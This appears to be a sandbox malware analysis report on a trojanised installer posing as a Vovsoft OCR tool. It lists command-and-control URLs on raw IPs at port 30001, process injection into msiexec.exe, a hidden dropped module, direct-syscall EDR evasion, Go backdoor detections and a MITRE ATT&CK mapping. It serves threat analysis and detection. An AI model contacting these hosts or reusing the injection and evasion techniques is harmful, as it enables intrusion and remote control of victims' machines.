Source: msiexec.exe, 00000007.00000002.2985258925.000000000E44E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://46.8.232.106:30001/api/helper-first-register?buildVersion=0Z5V.TE82Oth&md5=044037796cf2d13ead
Source: msiexec.exe, 00000007.00000002.2985258925.000000000E464000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://46.8.232.106:30001PXbyn4MOREQUEST_METHOD
Source: msiexec.exe, 00000007.00000002.2986200286.000000000E52A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://46.8.236.61:30001/api/helper-first-register
Source: msiexec.exe, 00000007.00000002.2986413586.000000000E59A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://46.8.236.61:30001/api/helper-first-register?
Source: msiexec.exe, 00000007.00000002.2986413586.000000000E59A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://46.8.236.61:30001/api/helper-first-register?abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVW
Source: msiexec.exe, 00000007.00000002.2986413586.000000000E5B4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://46.8.236.61:30001/api/helper-first-register?buildVersion=0Z5V.TE82Oth&md5=044037796cf2d13eadf
Source: msiexec.exe, 00000007.00000002.2986413586.000000000E58C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://46.8.236.61:3000146.8.236.61:30001
Source: msiexec.exe, 00000007.00000002.2986413586.000000000E58C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://46.8.236.61:3000146.8.236.61:300011u.
Source: msiexec.exe, 00000007.00000002.2986413586.000000000E582000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://91.212.166.91:30001
Source: msiexec.exe, 00000007.00000002.2986200286.000000000E52A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://91.212.166.91:30001/api/helper-first-register
Source: msiexec.exe, 00000007.00000002.2986413586.000000000E59A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://91.212.166.91:30001/api/helper-first-register?
Source: msiexec.exe, 00000007.00000002.2986413586.000000000E59A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://91.212.166.91:30001/api/helper-first-register?abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTU
Source: msiexec.exe, 00000007.00000002.2986413586.000000000E5B4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://91.212.166.91:30001/api/helper-first-register?buildVersion=0Z5V.TE82Oth&md5=044037796cf2d13ea
Source: msiexec.exe, 00000007.00000002.2986413586.000000000E582000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://91.212.166.91:30001MeQHYhigHTTP/1.1
Source: iKhdG3bwZK.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: iKhdG3bwZK.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: iKhdG3bwZK.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: iKhdG3bwZK.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: msiexec.exe, 00000007.00000002.2986413586.000000000E5A8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-EV-codeSigning-ECC-384-R2.cer0
Source: iKhdG3bwZK.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: iKhdG3bwZK.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: iKhdG3bwZK.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: iKhdG3bwZK.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: iKhdG3bwZK.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: msiexec.exe, 00000007.00000002.2986413586.000000000E5A8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-EV-codeSigning-ECC-384-R2.crl0
Source: msiexec.exe, 00000007.00000002.2986413586.000000000E5A8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crls.ssl.com/ssl.com-EVecc-RootCA.crl0
Source: iKhdG3bwZK.exe	String found in binary or memory: http://ocsp.digicert.com0
Source: iKhdG3bwZK.exe	String found in binary or memory: http://ocsp.digicert.com0A
Source: iKhdG3bwZK.exe	String found in binary or memory: http://ocsp.digicert.com0C
Source: iKhdG3bwZK.exe	String found in binary or memory: http://ocsp.digicert.com0X
Source: msiexec.exe, 00000007.00000002.2986413586.000000000E5A8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsps.ssl.com0
Source: msiexec.exe, 00000007.00000002.2986413586.000000000E5A8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsps.ssl.com0P
Source: msiexec.exe, 00000007.00000002.2986413586.000000000E584000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://proxyUsernameproxyUsername6R0WzU7TproxyPassword2kXPzHVWbuildVersionbuildVersion=HTTP/1.1
Source: msiexec.exe, 00000007.00000002.2986413586.000000000E584000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://proxyUsernameproxyUsername6R0WzU7TproxyPassword2kXPzHVWbuildVersionbuildVersion=HTTP/1.1&
Source: msiexec.exe, 00000007.00000002.2986413586.000000000E584000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://proxyUsernameproxyUsername6R0WzU7TproxyPassword2kXPzHVWbuildVersionbuildVersion=HTTP/1.1.
Source: msiexec.exe, 00000007.00000002.2985258925.000000000E44E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://proxyUsernameproxyUsername6R0WzU7TproxyPassword2kXPzHVWbuildVersionbuildVersion=HTTP/1.1X-Api
Source: iKhdG3bwZK.exe	String found in binary or memory: http://vovsoft.com
Source: iKhdG3bwZK.exe	String found in binary or memory: http://vovsoft.com/
Source: iKhdG3bwZK.exe	String found in binary or memory: http://vovsoft.com/blog/how-to-activate-using-license-key/openU
Source: iKhdG3bwZK.exe	String found in binary or memory: http://vovsoft.com/blog/how-to-uninstall-vovsoft-software/openU
Source: iKhdG3bwZK.exe	String found in binary or memory: http://vovsoft.com/help/
Source: iKhdG3bwZK.exe	String found in binary or memory: http://vovsoft.com/openU
Source: iKhdG3bwZK.exe	String found in binary or memory: http://vovsoft.comopenS
Source: iKhdG3bwZK.exe	String found in binary or memory: http://vovsoft.comopenU
Source: iKhdG3bwZK.exe	String found in binary or memory: http://www.aiim.org/pdfa/ns/id/
Source: iKhdG3bwZK.exe	String found in binary or memory: http://www.color.org
Source: iKhdG3bwZK.exe	String found in binary or memory: http://www.digicert.com/CPS0
Source: iKhdG3bwZK.exe	String found in binary or memory: http://www.indyproject.org/
Source: iKhdG3bwZK.exe, 00000000.00000002.1838026347.0000000006AF5000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2127296333.0000000004FA4000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2983761692.0000000004E6B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.info-zip.org/
Source: msiexec.exe, 00000007.00000002.2986413586.000000000E5A8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.ssl.com/repository/SSLcom-RootCA-EV-ECC-384-R1.crt0
Source: iKhdG3bwZK.exe	String found in binary or memory: https://vovsoft.com/blog/credits-and-acknowledgements/open
Source: iKhdG3bwZK.exe	String found in binary or memory: https://vovsoft.com/php/ocr_download.php?lang=
Source: iKhdG3bwZK.exe	String found in binary or memory: https://vovsoft.com/translation/
Source: iKhdG3bwZK.exe	String found in binary or memory: https://vovsoft.com/translation/openU
Source: iKhdG3bwZK.exe	String found in binary or memory: https://www.google.com/search?q=openSV
Source: msiexec.exe, 00000007.00000002.2986413586.000000000E5A8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ssl.com/repository0

Source: C:\Users\user\Desktop\iKhdG3bwZK.exe

Code function: 0_2_0070AFA2 NtQuerySystemInformation,

0_2_0070AFA2

Source: iKhdG3bwZK.exe

Static PE information: invalid certificate

Source: iKhdG3bwZK.exe

Static PE information: Number of sections : 11 > 10

Source: iKhdG3bwZK.exe, 00000000.00000000.1732008432.0000000000401000.00000020.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilename vs iKhdG3bwZK.exe
Source: iKhdG3bwZK.exe, 00000000.00000000.1732008432.0000000000401000.00000020.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFileName vs iKhdG3bwZK.exe
Source: iKhdG3bwZK.exe, 00000000.00000000.1732008432.0000000000401000.00000020.00000001.01000000.00000003.sdmp	Binary or memory string: \OriginalFileName vs iKhdG3bwZK.exe
Source: iKhdG3bwZK.exe, 00000000.00000002.1810667210.0000000004D27000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs iKhdG3bwZK.exe
Source: iKhdG3bwZK.exe, 00000000.00000002.1814575304.000000000508D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs iKhdG3bwZK.exe
Source: iKhdG3bwZK.exe, 00000000.00000000.1732755315.00000000012DA000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameocrreader.exeH vs iKhdG3bwZK.exe
Source: iKhdG3bwZK.exe, 00000000.00000002.1783137999.0000000003188000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamekernel32j% vs iKhdG3bwZK.exe
Source: iKhdG3bwZK.exe, 00000000.00000002.1783957684.0000000003694000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs iKhdG3bwZK.exe
Source: iKhdG3bwZK.exe, 00000000.00000002.1783957684.0000000003694000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFileName vs iKhdG3bwZK.exe
Source: iKhdG3bwZK.exe, 00000000.00000002.1783957684.0000000003694000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \OriginalFileName vs iKhdG3bwZK.exe
Source: iKhdG3bwZK.exe	Binary or memory string: OriginalFilename vs iKhdG3bwZK.exe
Source: iKhdG3bwZK.exe	Binary or memory string: OriginalFileName vs iKhdG3bwZK.exe
Source: iKhdG3bwZK.exe	Binary or memory string: \OriginalFileName vs iKhdG3bwZK.exe
Source: iKhdG3bwZK.exe	Binary or memory string: OriginalFilenameocrreader.exeH vs iKhdG3bwZK.exe

Source: iKhdG3bwZK.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: classification engine

Classification label: mal100.troj.evad.winEXE@7/6@0/6

Source: C:\Windows\SysWOW64\more.com

File created: C:\Users\user\AppData\Roaming\docker

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6720:120:WilError_03

Source: C:\Users\user\Desktop\iKhdG3bwZK.exe

File created: C:\Users\user\AppData\Local\Temp\4c76ba0e

Jump to behavior

Source: C:\Users\user\Desktop\iKhdG3bwZK.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\iKhdG3bwZK.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Roaming\docker\LogiAiPrompt.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Roaming\docker\LogiAiPrompt.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Windows\SysWOW64\more.com

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\iKhdG3bwZK.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: iKhdG3bwZK.exe

ReversingLabs: Detection: 33%

Source: iKhdG3bwZK.exe	String found in binary or memory: NATS-SEFI-ADD
Source: iKhdG3bwZK.exe	String found in binary or memory: NATS-DANO-ADD
Source: iKhdG3bwZK.exe	String found in binary or memory: JIS_C6229-1984-b-add
Source: iKhdG3bwZK.exe	String found in binary or memory: jp-ocr-b-add
Source: iKhdG3bwZK.exe	String found in binary or memory: JIS_C6229-1984-hand-add
Source: iKhdG3bwZK.exe	String found in binary or memory: jp-ocr-hand-add
Source: iKhdG3bwZK.exe	String found in binary or memory: ISO_6937-2-add
Source: iKhdG3bwZK.exe	String found in binary or memory: /Add: Unexpected [%] object property in an array
Source: iKhdG3bwZK.exe	String found in binary or memory: ;application/vnd.adobe.air-application-installer-package+zip
Source: iKhdG3bwZK.exe	String found in binary or memory: application/vnd.groove-help
Source: iKhdG3bwZK.exe	String found in binary or memory: "application/x-install-instructions

Source: C:\Users\user\Desktop\iKhdG3bwZK.exe

File read: C:\Users\user\Desktop\iKhdG3bwZK.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\iKhdG3bwZK.exe "C:\Users\user\Desktop\iKhdG3bwZK.exe"
Source: C:\Users\user\Desktop\iKhdG3bwZK.exe	Process created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.com
Source: C:\Windows\SysWOW64\more.com	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\more.com	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\docker\LogiAiPrompt.exe "C:\Users\user\AppData\Roaming\docker\LogiAiPrompt.exe"
Source: C:\Users\user\Desktop\iKhdG3bwZK.exe	Process created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.com	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe	Jump to behavior

Source: C:\Users\user\Desktop\iKhdG3bwZK.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\iKhdG3bwZK.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\iKhdG3bwZK.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\iKhdG3bwZK.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\iKhdG3bwZK.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\iKhdG3bwZK.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\iKhdG3bwZK.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\iKhdG3bwZK.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\iKhdG3bwZK.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\iKhdG3bwZK.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\iKhdG3bwZK.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\iKhdG3bwZK.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\iKhdG3bwZK.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\iKhdG3bwZK.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Users\user\Desktop\iKhdG3bwZK.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\Desktop\iKhdG3bwZK.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\Desktop\iKhdG3bwZK.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\Desktop\iKhdG3bwZK.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\iKhdG3bwZK.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\docker\LogiAiPrompt.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\docker\LogiAiPrompt.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\docker\LogiAiPrompt.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\docker\LogiAiPrompt.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\docker\LogiAiPrompt.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\docker\LogiAiPrompt.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\docker\LogiAiPrompt.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\docker\LogiAiPrompt.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\docker\LogiAiPrompt.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\docker\LogiAiPrompt.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\docker\LogiAiPrompt.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\docker\LogiAiPrompt.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\docker\LogiAiPrompt.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\docker\LogiAiPrompt.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\docker\LogiAiPrompt.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\docker\LogiAiPrompt.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\docker\LogiAiPrompt.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\docker\LogiAiPrompt.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\docker\LogiAiPrompt.exe	Section loaded: shdocvw.dll	Jump to behavior

Source: C:\Windows\SysWOW64\more.com

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{5CE34C0D-0DC9-4C1F-897C-DAA1B78CEE7C}\InProcServer32

Jump to behavior

Source: romr.1.dr

LNK file: ..\..\Roaming\docker\LogiAiPrompt.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: iKhdG3bwZK.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: iKhdG3bwZK.exe

Static file information: File size 21120968 > 1048576

Source: iKhdG3bwZK.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x556000
Source: iKhdG3bwZK.exe	Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x8c3200

Source: iKhdG3bwZK.exe

Static PE information: More than 200 imports for user32.dll

Source: iKhdG3bwZK.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wntdll.pdbUGP source: iKhdG3bwZK.exe, 00000000.00000002.1810667210.0000000004C04000.00000004.00000020.00020000.00000000.sdmp, iKhdG3bwZK.exe, 00000000.00000002.1814575304.0000000004F60000.00000004.00000800.00020000.00000000.sdmp, more.com, 00000001.00000002.2127160017.0000000004C48000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2127756326.00000000057B0000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2984685137.0000000005670000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2983556026.0000000004B04000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: iKhdG3bwZK.exe, 00000000.00000002.1810667210.0000000004C04000.00000004.00000020.00020000.00000000.sdmp, iKhdG3bwZK.exe, 00000000.00000002.1814575304.0000000004F60000.00000004.00000800.00020000.00000000.sdmp, more.com, 00000001.00000002.2127160017.0000000004C48000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2127756326.00000000057B0000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2984685137.0000000005670000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2983556026.0000000004B04000.00000004.00000020.00020000.00000000.sdmp

Source: iKhdG3bwZK.exe	Static PE information: section name: .didata
Source: yrpfhpihdypx.1.dr	Static PE information: section name: .symtab
Source: yrpfhpihdypx.1.dr	Static PE information: section name: lubvlv

Source: C:\Windows\SysWOW64\more.com

File created: C:\Users\user\AppData\Local\Temp\yrpfhpihdypx

Jump to dropped file

Source: C:\Windows\SysWOW64\more.com

File created: C:\Users\user\AppData\Local\Temp\yrpfhpihdypx

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Found hidden mapped module (file has been removed from disk)

Source: C:\Windows\SysWOW64\more.com

Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\YRPFHPIHDYPX

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 30001
Source: unknown	Network traffic detected: HTTP traffic on port 30001 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 30001
Source: unknown	Network traffic detected: HTTP traffic on port 30001 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 30001
Source: unknown	Network traffic detected: HTTP traffic on port 30001 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 30001
Source: unknown	Network traffic detected: HTTP traffic on port 30001 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 30001
Source: unknown	Network traffic detected: HTTP traffic on port 30001 -> 49750

Source: C:\Users\user\Desktop\iKhdG3bwZK.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iKhdG3bwZK.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\docker\LogiAiPrompt.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\docker\LogiAiPrompt.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\iKhdG3bwZK.exe	API/Special instruction interceptor: Address: 6CEA7C44
Source: C:\Users\user\Desktop\iKhdG3bwZK.exe	API/Special instruction interceptor: Address: 6CEA7945
Source: C:\Windows\SysWOW64\more.com	API/Special instruction interceptor: Address: 6CEA3B54
Source: C:\Windows\SysWOW64\msiexec.exe	API/Special instruction interceptor: Address: 35BC87
Source: C:\Users\user\AppData\Roaming\docker\LogiAiPrompt.exe	API/Special instruction interceptor: Address: 6CEA7C44

Source: C:\Windows\SysWOW64\more.com

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\yrpfhpihdypx

Jump to dropped file

Source: msiexec.exe, 00000007.00000002.2983411875.000000000311A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\iKhdG3bwZK.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\iKhdG3bwZK.exe

Code function: 0_2_0070B672 mov eax, dword ptr fs:[00000030h]

0_2_0070B672

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\Desktop\iKhdG3bwZK.exe	NtSetInformationThread: Direct from: 0x70C313			Jump to behavior
Source: C:\Users\user\AppData\Roaming\docker\LogiAiPrompt.exe	NtProtectVirtualMemory: Direct from: 0x76EF7B2E			Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\iKhdG3bwZK.exe

Section loaded: NULL target: C:\Windows\SysWOW64\more.com protection: read write

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\more.com	Memory written: C:\Windows\SysWOW64\msiexec.exe base: 359330			Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Memory written: C:\Windows\SysWOW64\msiexec.exe base: 26AA008			Jump to behavior

Source: C:\Users\user\Desktop\iKhdG3bwZK.exe	Process created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.com			Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe			Jump to behavior

Source: C:\Users\user\Desktop\iKhdG3bwZK.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\4c76ba0e VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\docker\LogiAiPrompt.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\6460e813 VolumeInformation	Jump to behavior

Stealing of Sensitive Information

Yara detected GO Backdoor

Source: Yara match	File source: 00000007.00000002.2986200286.000000000E52E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2986200286.000000000E544000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2986200286.000000000E540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msiexec.exe PID: 6620, type: MEMORYSTR

Remote Access Functionality

Yara detected GO Backdoor

Source: Yara match	File source: 00000007.00000002.2986200286.000000000E52E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2986200286.000000000E544000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2986200286.000000000E540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msiexec.exe PID: 6620, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	11 DLL Side-Loading	211 Process Injection	11 Masquerading	OS Credential Dumping	11 Security Software Discovery	Remote Services	Data from Local System	11 Non-Standard Port	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Abuse Elevation Control Mechanism	211 Process Injection	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
